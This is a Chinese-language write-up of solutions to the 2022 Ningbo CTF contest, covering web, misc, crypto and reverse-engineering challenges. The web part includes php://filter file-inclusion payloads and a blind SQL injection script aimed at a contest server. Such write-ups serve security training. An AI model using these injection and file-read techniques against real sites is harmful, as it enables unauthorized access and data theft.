2022宁波市第五届网络安全大赛

date

May 15, 2022

slug

csc-ningbo-ctf-2022

status

Published

Web

OneTwoThree

<?php

highlight_file(__FILE__);
error_reporting(0);
include("ans.php");

if(isset($_GET["one"]) && isset($_GET["two"]) && isset($_POST["three"]))
{
    $one = $_GET["one"];
    $two = $_GET["two"];
    echo "111";
    $three = $_POST["three"];
    if(!empty($one) && !empty($two) && !empty($three))
    {
        echo "222";
        echo 
        echo file_get_contents($two);
        if(file_get_contents($two) === "g00dJ0b" and file_get_contents($three) ===  "onTh1s")
        {
            var_dump($one);
            include($one);
        }
    }
    else
        die("Insufficient Parameters");
}

此处就是要构造一个one two three

one就是文件位置 two和three就对应文件内容

然后找flag

one=php://filter/convert.base64-encode/resource=ans.php

Lesen

<?php
error_reporting(0);
highlight_file(__FILE__);
$from = $_GET['from'];
$to = $_GET['to'];
if(!isset($from) or !isset($to) or stripos($from, "flag")!=FALSE)
{
    $from = "behind.php";
}

include($from);// read flag.php

if(isset($to))
{
    $a = unserialize($to);
    $a->sayTheFlag();
}

include了一个from 先读behind.php

php://filter/convert.base64-encode/resource=behind.php&to=

解base64 构造php反序列化

最后打反序列化就行了

ScoreQuery

SQL注入

先尝试注入点

id=0'//or//1%23

有注入点布尔盲注

然后过滤了挺多还没limit

import requests
import string
s = string.printable
flag = ''

for a in range(1,45):
    for  b in s:
        url="http://119.61.19.217:55012/?id=0'/**/or/**/substr(binary(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{},1)='{}'%23".format(a,b)
        r = requests.get(url)
        if  len(r.text)==2263:
            print(b)
            flag += b
            break

表名出来后就方便多了 TheFl4g

Misc

BlackAndWhite

打开都是黑黑白白的图片直接写脚本提取0 和1

import hashlib, os

dirpath = r"C:\Users\32253\Downloads\target\target"
filenames = os.listdir(dirpath)
str1=""
for i in range(0,335):
    filepath =  dirpath + "\\" + str(i) +".png"
    fd = open(filepath, "rb")
    f = fd.read()
    pmd5 = hashlib.md5(f)
    if(pmd5.hexdigest() == "fc83ab4f43d9ba8b952344397db45884"):
        str1+="0"
    else:
        str1 += "1"
    print( pmd5.hexdigest())

print(str1)

01100110011011000110000101100111011110110110001001100001011000010110011000110000001100010011001101100100001011010110011000110011011001100110000100101101011000100110001101100010011001010010110100110000001100000110011001100010001011010011000101100101001100010110000100110011001101000110001001100010001100100110000101100110001100010111110

直接转个字符就完事

Analyze

这题binwalk分离出压缩包

然后压缩包里password.txt 根据文章内的base64

生成一个压缩包

明文攻击

然后得到图片 lsb就行

DocDocDoc

改压缩包后两张图片

直接拉长

rot完事

Digital_plate

打开流量包发现报错

文件隐写

题目名字就知道是数位板

tshark -r Digital_plate.pcapng -T fields -e usbhid.data | sed '/^\s*$/d' > out.txt

前三位为固定数值 088，后八位也为固定数值 00000000

第四位 0 和 1 代表的就是数位笔是否在数位板上画画数据小端序

解密脚本：

f = open('out.txt','r')
fi = open('result.txt','w')
while 1:
		a = f.readline()
		if not a:
				break
		a = a.strip('\n')
		if a[3] == '1':
				x = int(a[4:6],16) + int(a[6:8],16)*256
				fi.write(str(x))
				fi.write(' ')
				y = int(a[8:10],16) + int(a[10:12],16)*256
				fi.write(str(-y))
				fi.write('\n')
fi.close()

gnuplot 画图

key: kaseyd4wi2v3sc518dc84bsa4a9

得到一张

silenteye 隐写，但是失败了

猜测是压感

第四位为 1，数位板滑动时，代表 y 轴的 9-12 位数据，后面还会出现 13-16 位这四位数据，这个数据代表的就是数位笔在数位板上的压感，

提取数据

f = open('out.txt','r')
fi = open('result.txt','w')
while 1:
		a = f.readline()
		if not a:
				break
		a = a.strip('\n')
		# a[3] == '1': 
		if a[3] == '1' and int(a[12], 16) < 15: 
				x = int(a[4:6],16) + int(a[6:8],16)*256
				fi.write(str(x))
				fi.write(' ')
				y = int(a[8:10],16) + int(a[10:12],16)*256
				fi.write(str(-y))
				fi.write('\n')
fi.close()

画图得到key

18cba496 作为 key， silenteye 隐写解密，SilentEy

Crypto

Cr4ck2

共模攻击

工具一把梭

CrackCi4er

from Crypto.Util.number import *
from gmpy2 import *
n1 = 11176298870415783282835275600061588657241463221871815491519552463408222565848079182034726185553217300689834006691472991129441397322597826835250447941841691221722446721416543093739804095340289908080867514473017079450311811803390124042848711639790285918640813661662931152276554784900720865966499111108283873361431767904939435365613871971085278398890357112336497323679975134482016115656435362909033743450396163540000606741105863043851991894541522258647025814542415404601472738921699995816713634130792482175987161484763035331960944948454215703767860312632963837039408460375085094414827681771078520774697140944693853984807
e1 = 65537
c1 = 2049142135212658273552941633440876974261753950640752177129652784905850352983432165679473874335026848351759145400964320244625330038089105524551008485108728021427824946995632603255126856753379578506783543964229942691440283255564049755866340136558644811545593331062075012791047810799296947253097390153311675026488654024461487543916802274460814350607787642849014894123082002047937769332643099034647856519147303533346991657725362212257992947710783698461322996483407717614984051267795550326657436918537790720050369514765616726515746420611017668922783549766178919288340405167353735762652502730158055821103551775066192064940
n2 = 14628452939723832473083511588210968910703852366589447308951932044211910559763838916687688620001947054794920424786224454850360778661660629608440528771433740169617993746720487612895876527947146072847716801945896849734515808742075452921890154367709390274374214553338701757577794537605478287979768372097249554390580052172699840182271033424438872211305351156295892595685726305130041874916916020353812984449226411372273954813167019471238042495646276279660976339456926385932462006559332070335515545249174455248514776056358317967032302203257464029754343434591788379595459973195410239904214340484044230212500028487107907195511
e2 = 257
c2 = 11943205429311148875261223425325670018169389197701624890446423663741223099186719632396529960156133015204496469625640992919935968122637192599196371711838810220085238215262686806595336187870118202291530645896788972981251362909696182206907049609819898202930423639770839482639933302200456662731930250303528462910052641021629680394116429930827997772982263970377753077015400323639702289539464290789532346689721249411805236223494026306249551854876805588677162485280664852101462907768951836328019109252702022466487857197139878204830652768250506210934257536926923356529983555063859891380882309438020999240607414375022018574614
p = gcd(n1,n2)
a = n1//p
b = n2//p
print(a)
print(b)
c = invert(e1,(p-1)*(a-1))
d = invert(e2,(p-1)*(b-1))
print(long_to_bytes(pow(c1,c,n1)))
print(long_to_bytes(pow(c2,d,n2)))

Reverse

go2cry

8位一组加密，共计4组

part 1

简单单字节操作

循环结构如下

for i in range(0, 4, 3)

而后调用math_big___ptr_Int__SetInt64 转为int64

math_big_nat_setBytes转为big-endian

part 2

而后进入异或循环，v14有符号，通过判断符号正负确定是否异或

part 3

最后进入位操作，看起来很复杂，实际上只是将每个字节按照位序拼接

化简运算之后

# 0x60DEA84CFE06B24C
revs = [0x4C, 0xB2, 0x06, 0xFE, 0x4C, 0xA8, 0xDE, 0x60]

enc = [0] * 8
for k in range(8):
    for m in range(8):
        enc[k] |= ((ROL(revs[m], 5, 8) >> (7 - k) & 1) * 0x80) >> m
        # if ROL(revs[m], 5, 8) >> (7 - k) & 1:
        #     enc[k] |= 0x80 >> m

print([bin(ROL(i, 5, 8))[2:].zfill(8) for i in revs])
print([bin(i)[2:].zfill(8) for i in enc])

# ['10001001', '01010110', '11000000', '11011111', '10001001', '00010101', '11011011', '00001100']
# ['10111010', '01110010', '00000000', '01010110', '10011011', '01010101', '01010010', '10011110']

完整脚本如下

# -*- coding:utf-8 -*-
"""
@Author: Mas0n
@File: t2.py
@Time: 2022/5/15 11:03
@Desc: It's all about getting better.
"""
from z3 import *


def ROL(data, shift, size=32):
    shift %= size
    remains = data >> (size - shift)
    body = (data << shift) - (remains << size )
    return body + remains


def ROR(data, shift, size=32):
    shift %= size
    body = data >> shift
    remains = (data << (size - shift)) - (body << size)
    return body + remains


def solves(res):
    sol = Solver()
    raw = [BitVec(f"flag[{i}]", 8) for i in range(8)]
    inp = raw.copy()
    for i in range(0, 4, 3):
        v20 = inp[i] ^ inp[i + 2]
        inp[i] = v20

        v19 = v20 ^ inp[i + 2] ^ inp[i + 1]
        inp[i + 1] = v19
        inp[i + 2] ^= v19

    v14 = Concat(*inp)

    for i in range(64):
        v14 = (v14 * 2) ^ (((v14 >> 63) & 1) * 0x2EF20D07161E85F7)

    inp3 = [
               Extract(7, 0, v14),
               Extract(15, 8, v14),
               Extract(23, 16, v14),
               Extract(31, 24, v14),
               Extract(39, 32, v14),
               Extract(47, 40, v14),
               Extract(55, 48, v14),
               Extract(63, 56, v14),
    ]
    temp = [0] * 8
    for i in range(8):
        ch = 0
        for j in range(8):
            ch <<= 1
            ch += res[j] >> (7 - i) & 1
        ch = ROR(ch, 5, 8)
        temp[i] = ch

    for i in range(8):
        sol.add(inp3[i] == temp[i])

    assert sol.check() == sat
    mol = sol.model()
    print(bytearray([mol.eval(i).as_long() for i in raw]))


cmpdata = [0xC8, 0x34, 0x59, 0x4E, 0xC0, 0xD5, 0xAD, 0x08, 0xC9, 0x2B, 0x4C, 0xDA, 0xE6, 0xC0, 0x9A, 0x19, 0xB5, 0x10, 0x55, 0x7D, 0xE8, 0xF5, 0x83, 0xFF, 0x74, 0x8B, 0xE3, 0xD4, 0x6A, 0x7D, 0x44, 0x58]
for i in range(0, len(cmpdata), 8):
    solves(cmpdata[i:i+8])

andlua

明文lua

改了解释器

这里看到check

分析下vm的执行

看到操作关键数组

简单字节操作

逆循环即可

# -*- coding:utf-8 -*-
"""
@Author: Mas0n
@File: t3.py
@Time: 2022/5/15 13:34
@Desc: It's all about getting better.
"""

data = """input_byte[0] = 23
    input_byte[0] = 5
    input_byte[0] = 33
    input_byte[0] = 11
    input_byte[0] = 14
    input_byte[1] = 10
    input_byte[1] = 21
    input_byte[1] = 7
    input_byte[1] = 40
    input_byte[1] = 12
    input_byte[2] = 32
    input_byte[2] = 32
    input_byte[2] = 35
    input_byte[2] = 13
    input_byte[2] = 14
    input_byte[3] = 26
    input_byte[3] = 7
    input_byte[3] = 25
    input_byte[3] = 25
    input_byte[3] = 1
    input_byte[4] = 3
    input_byte[4] = 4
    input_byte[4] = 13
    input_byte[4] = 27
    input_byte[4] = 5
    input_byte[5] = 25
    input_byte[5] = 13
    input_byte[5] = 1
    input_byte[5] = 33
    input_byte[5] = 38
    input_byte[6] = 33
    input_byte[6] = 24
    input_byte[6] = 31
    input_byte[6] = 17
    input_byte[6] = 24
    input_byte[7] = 20
    input_byte[7] = 26
    input_byte[7] = 8
    input_byte[7] = 20
    input_byte[7] = 40
    input_byte[8] = 25
    input_byte[8] = 18
    input_byte[8] = 3
    input_byte[8] = 7
    input_byte[8] = 34
    input_byte[9] = 26
    input_byte[9] = 37
    input_byte[9] = 8
    input_byte[9] = 15
    input_byte[9] = 28
    input_byte[10] = 31
    input_byte[10] = 21
    input_byte[10] = 31
    input_byte[10] = 19
    input_byte[10] = 21
    input_byte[11] = 19
    input_byte[11] = 3
    input_byte[11] = 37
    input_byte[11] = 13
    input_byte[11] = 20
    input_byte[12] = 18
    input_byte[12] = 12
    input_byte[12] = 15
    input_byte[12] = 3
    input_byte[12] = 4
    input_byte[13] = 33
    input_byte[13] = 21
    input_byte[13] = 33
    input_byte[13] = 7
    input_byte[13] = 18
    input_byte[14] = 15
    input_byte[14] = 23
    input_byte[14] = 3
    input_byte[14] = 12
    input_byte[14] = 40
    input_byte[15] = 11
    input_byte[15] = 32
    input_byte[15] = 25
    input_byte[15] = 34
    input_byte[15] = 36
    input_byte[16] = 9
    input_byte[16] = 9
    input_byte[16] = 37
    input_byte[16] = 19
    input_byte[16] = 27
    input_byte[17] = 36
    input_byte[17] = 10
    input_byte[17] = 30
    input_byte[17] = 14
    input_byte[17] = 14
    input_byte[18] = 10
    input_byte[18] = 34
    input_byte[18] = 6
    input_byte[18] = 31
    input_byte[18] = 27
    input_byte[19] = 11
    input_byte[19] = 9
    input_byte[19] = 29
    input_byte[19] = 40
    input_byte[19] = 5
    input_byte[20] = 20
    input_byte[20] = 35
    input_byte[20] = 26
    input_byte[20] = 29
    input_byte[20] = 21
    input_byte[21] = 31
    input_byte[21] = 19
    input_byte[21] = 8
    input_byte[21] = 1
    input_byte[21] = 4
    input_byte[22] = 37
    input_byte[22] = 39
    input_byte[22] = 25
    input_byte[22] = 12
    input_byte[22] = 20
    input_byte[23] = 17
    input_byte[23] = 24
    input_byte[23] = 19
    input_byte[23] = 1
    input_byte[23] = 9
    input_byte[24] = 19
    input_byte[24] = 18
    input_byte[24] = 11
    input_byte[24] = 28
    input_byte[24] = 21
    input_byte[25] = 7
    input_byte[25] = 6
    input_byte[25] = 6
    input_byte[25] = 31
    input_byte[25] = 8
    input_byte[26] = 9
    input_byte[26] = 22
    input_byte[26] = 13
    input_byte[26] = 14
    input_byte[26] = 30
    input_byte[27] = 7
    input_byte[27] = 19
    input_byte[27] = 34
    input_byte[27] = 3
    input_byte[27] = 9
    input_byte[28] = 39
    input_byte[28] = 16
    input_byte[28] = 28
    input_byte[28] = 15
    input_byte[28] = 15
    input_byte[29] = 26
    input_byte[29] = 19
    input_byte[29] = 11
    input_byte[29] = 15
    input_byte[29] = 27
    input_byte[30] = 29
    input_byte[30] = 32
    input_byte[30] = 11
    input_byte[30] = 26
    input_byte[30] = 33
    input_byte[31] = 13
    input_byte[31] = 10
    input_byte[31] = 11
    input_byte[31] = 8
    input_byte[31] = 12
    input_byte[32] = 14
    input_byte[32] = 21
    input_byte[32] = 13
    input_byte[32] = 9
    input_byte[32] = 13
    input_byte[33] = 21
    input_byte[33] = 9
    input_byte[33] = 24
    input_byte[33] = 27
    input_byte[33] = 23
    input_byte[34] = 10
    input_byte[34] = 7
    input_byte[34] = 24
    input_byte[34] = 8
    input_byte[34] = 39
    input_byte[35] = 8
    input_byte[35] = 30
    input_byte[35] = 21
    input_byte[35] = 37
    input_byte[35] = 20
    input_byte[36] = 30
    input_byte[36] = 26
    input_byte[36] = 2
    input_byte[36] = 17
    input_byte[36] = 29
    input_byte[37] = 22
    input_byte[37] = 8
    input_byte[37] = 31
    input_byte[37] = 16
    input_byte[37] = 8
"""
cmpdata = bytearray([0x00000066, 0x00000080, 0x0000005D, 0x00000075, 0x00000095, 0x0000003D, 0x0000004B, 0x0000005B, 0x000000A0, 0x0000000C, 0x0000002F, 0x0000006E, 0x0000005A, 0x00000081, 0x00000044, 0x00000053, 0x0000000E, 0x00000070, 0x0000005E, 0x00000008, 0x00000014, 0x00000035, 0x00000020, 0x00000066, 0x0000009F, 0x00000033, 0x00000049, 0x00000046, 0x0000006B, 0x0000004D, 0x0000002F, 0x0000005E, 0x00000062, 0x0000000F, 0x00000053, 0x00000067, 0x0000005D, 0x00000084])

OPCode = []
for line in data.splitlines():
    OPCode.append(int(line.split("= ")[1]))

idx = 0
for i in range(0, len(OPCode), 5):
    for j in range(4, -1, -1):
        op = OPCode[i + j]
        if op > 9:
            if op > 19:
                cmpdata[idx] ^= op
            else:
                cmpdata[idx] -= op
        else:
            cmpdata[idx] += op
    idx += 1

print(cmpdata)